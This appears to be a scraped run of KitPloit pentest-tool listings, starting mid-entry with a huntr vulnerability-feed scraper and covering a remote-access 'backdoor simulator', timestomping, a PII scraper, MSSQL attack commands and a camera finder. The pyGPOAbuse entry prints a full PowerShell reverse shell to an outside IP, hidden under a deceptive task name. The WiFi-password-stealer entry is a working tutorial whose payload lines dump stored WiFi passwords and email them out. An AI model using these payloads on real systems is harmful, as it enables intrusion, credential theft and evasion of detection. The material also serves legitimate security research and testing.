    1. Arbitrary File Reading due to Lack of Input Filepath Validation
    - Feb 6th 2024 / High (CVE-2024-0964)
    - gradio-app/gradio
    - https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

    2. View Barcode Image leads to Remote Code Execution
    - Jan 31st 2024 / Critical (CVE: Not yet)
    - dolibarr/dolibarr
    - https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

    (delimiter-based file database)

    # vim feeds.db

    1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
    2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
    3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
    4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
    5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/
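    Because feeds.db is just a pipe-delimited text file, it is easy to post-process. Below is a minimal sketch that parses the lines shown above; the field meanings (index, collected-at timestamp, hash, CVE, report URL) are inferred from that listing.

    from pathlib import Path

    # Field layout inferred from the sample listing above:
    # index | collected-at timestamp | hash | CVE (or "CVE: Not yet") | report URL
    for line in Path('feeds.db').read_text().splitlines():
        if not line.strip():
            continue
        idx, collected_at, digest, cve, url = line.split('|', 4)
        if cve.startswith('CVE-'):
            print(f'{cve}: {url}')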

    Notes
    • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
    • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
    • In a typical cloud environment, the script may not function properly within virtual machines (VMs).


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BackDoorSim - An Educational Into Remote Administration Tools

    By: Zion3R β€” February 26th 2024 at 11:30


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

    $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    2. Navigate to the project directory:

    $ cd BackDoorSim

    3. Install the required dependencies:

    $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational into Remote Administration Tools

    If you want to read our article about Backdoor


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SpeedyTest - Command-Line Tool For Measuring Internet Speed

    By: Zion3R β€” February 21st 2024 at 11:30


    SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


    Features
    • Measure download speed, upload speed, and ping latency.
    • Generate detailed reports with graphical representation of speed test results.
    • Save and export test results in various formats (CSV, JSON, etc.).
    • Customize speed test parameters and server selection.
    • Compare speed test results over time to track performance changes.
    • Integrate SpeedyTest into your own applications using the provided API.
    • Track your results over time with a saved database.

    Installation
    git clone https://github.com/HalilDeniz/SpeedyTest.git

    Requirements

    Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

    pip install -r requirements.txt

    Usage

    Run the following command to perform a speed test:

    python3 speendytest.py

    Visual Output



    Output
    Receiving data \
    Speed test completed!
    Speed test time: 20.22 second
    Server : Farknet - Konya
    IP Address: speedtest.farknet.com.tr:8080
    Country : Turkey
    City : Konya
    Ping : 20.41 ms
    Download : 90.12 Mbps
    Loading : 20 Mbps
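    As a rough illustration of how a download figure like the one above can be computed (this is not SpeedyTest's actual implementation), the sketch below times an HTTP download and converts it to Mbps; the test URL is a placeholder you would replace with a file you are allowed to fetch.

    import time
    import urllib.request

    TEST_URL = 'http://speedtest.tele2.net/10MB.zip'  # placeholder test file

    start = time.time()
    data = urllib.request.urlopen(TEST_URL, timeout=30).read()
    elapsed = time.time() - start
    mbps = (len(data) * 8) / (elapsed * 1_000_000)
    print(f'Downloaded {len(data)} bytes in {elapsed:.2f} s -> {mbps:.2f} Mbps')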







    Contributing

    Contributions are welcome! To contribute to SpeedyTest, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about SpeedyTest, please feel free to contact me:


    License

    SpeedyTest is released under the MIT License. See LICENSE for details.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MrHandler - Linux Incident Response Reporting

    By: Zion3R β€” February 17th 2024 at 23:30

    Β 


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

    By: Zion3R β€” February 9th 2024 at 11:30


    Execute code within Azure Automation service without getting charged

    Description

    CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

    • This flow was reported to Microsoft on 3/23, which decided not to change the service behavior as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.

    • Each execution is limited to 3 hours


    Requirements

    1. Python 3.8+ with the libraries mentioned in the file requirements.txt
    2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
      • Account must be logged in before using this tool

    Installation

    pip install .

    Usage

    usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

    CloudMiner - Free computing power in Azure Automation Service

    optional arguments:
    -h, --help show this help message and exit
    --path PATH the script path (Powershell or Python)
    --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
    -c COUNT, --count COUNT
    number of executions
    -t TOKEN, --token TOKEN
    Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
    -r REQUIREMENTS, --requirements REQUIREMENTS
    Path to requirements file to be installed and use by the script (relevant to Python scripts only)
    -v, --verbose Enable verbose mode

    Example usage

    Python

    Powershell

    License

    CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

    Author - Ariel Gamrian



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

    By: Zion3R β€” January 31st 2024 at 11:30


    A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

    • Change timestamps for individual files or directories.
    • Recursively apply timestamps to all files in a directory.
    • Option to use specific credentials for remote paths or privileged files.

    I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

    Usage

    • -Path: The path to the file or directory whose timestamps you wish to modify.
    • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
    • -Credentials: (Optional) If you need to specify a different user's credentials.
    • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

    Usage Examples

    Specify the -Recurse switch to apply timestamps recursively:

    1. Change the timestamp of an individual file:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
    2. Recursively change timestamps for all files in a directory:
    Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
    3. Use specific credentials:
    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R β€” January 22nd 2024 at 11:30


    Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypassing modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
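    As a simple illustration of regex-based extraction (these are not Uscrapper's actual patterns), the sketch below pulls email addresses out of a page's HTML; the URL is a placeholder, and the real tool adds Selenium-based fetching, crawling and multithreading.

    import re
    import urllib.request

    EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')  # illustrative pattern

    html = urllib.request.urlopen('https://example.com').read().decode('utf-8', 'ignore')
    for email in sorted(set(EMAIL_RE.findall(html))):
        print(email)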


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.

    What's New?

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-web-scraping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

    By: Zion3R β€” January 17th 2024 at 11:30


    Python partial implementation of SharpGPOAbuse by @pkb1s

    This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

    Default behavior adds a local administrator.


    How to use

    Basic usage

    Add john user to local administrators group (Password: H4x00r123..)

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

    Advanced usage

    Reverse shell example

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user

    Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R β€” January 2nd 2024 at 11:30


    Have you ever watched a film where a hacker would plug a seemingly ordinary USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

    Β 

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE commands simulate presses of those keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses an .ini-style keyfile format to store network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion matches at a certain position in the string, i.e. at a position right after the keyword, without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
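    The effect of the lookbehind is easy to check in isolation; this is a minimal illustration of the regex itself on a keyfile-style string, not part of the payload.

    import re

    sample = 'ssid=HomeNetwork\npsk=SuperSecret123'  # keyfile-style sample text

    # (?<=ssid=) matches right after the literal "ssid=" without including it in the match.
    print(re.search(r'(?<=ssid=).*', sample).group())  # -> HomeNetwork
    print(re.search(r'(?<=psk=).*', sample).group())   # -> SuperSecret123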

    For more information about NetworkManager, here are some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy; actually it's quite the opposite: it's really bulky, especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pantheon - Insecure Camera Parser

    By: Zion3R β€” January 1st 2024 at 11:30


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully independent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R β€” December 19th 2023 at 11:30


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

    adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
    clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns [NORM] Enumerate columns within a table [I,L]
    databases [NORM] Enumerate databases on a server [I,L]
    disableclr [PRIV] Disable CLR integration [I,L]
    disableole [PRIV] Disable OLE automation procedures [I,L]
    disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp [PRIV] Disable xp_cmdshell [I,L]
    enableclr [PRIV] Enable CLR integration [I,L]
    enableole [PRIV] Enable OLE automation procedures [I,L]
    enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp [PRIV] Enable xp_cmdshell [I,L]
    impersonate [NORM] Enumerate users that can be impersonated
    info [NORM] Gather information about the SQL server
    links [NORM] Enumerate linked servers [I,L]
    olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
    query [NORM] Execute a custom SQL query [I,L]
    rows [NORM] Get the count of rows in a table [I,L]
    search [NORM] Search a table for a column name [I,L]
    smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables [NORM] Enumerate tables within a database [I,L]
    users [NORM] Enumerate users with database access [I,L]
    whoami [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate are incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MacMaster - MAC Address Changer

    By: Zion3R β€” December 18th 2023 at 11:30


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.
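    For context on what --random and --customoui do conceptually, here is a minimal sketch of generating a MAC address from a given OUI (an illustration only, not MacMaster's actual code). Actually applying the address to an interface still requires root, as the Note below explains.

    import random

    def random_mac(oui='08:00:27'):
        # Keep the given OUI (first three octets) and randomize the remaining three.
        tail = [random.randint(0x00, 0xFF) for _ in range(3)]
        return oui + ':' + ':'.join(f'{octet:02x}' for octet in tail)

    print(random_mac())            # e.g. 08:00:27:3f:a1:c2
    print(random_mac('00:11:22'))  # custom OUI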

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
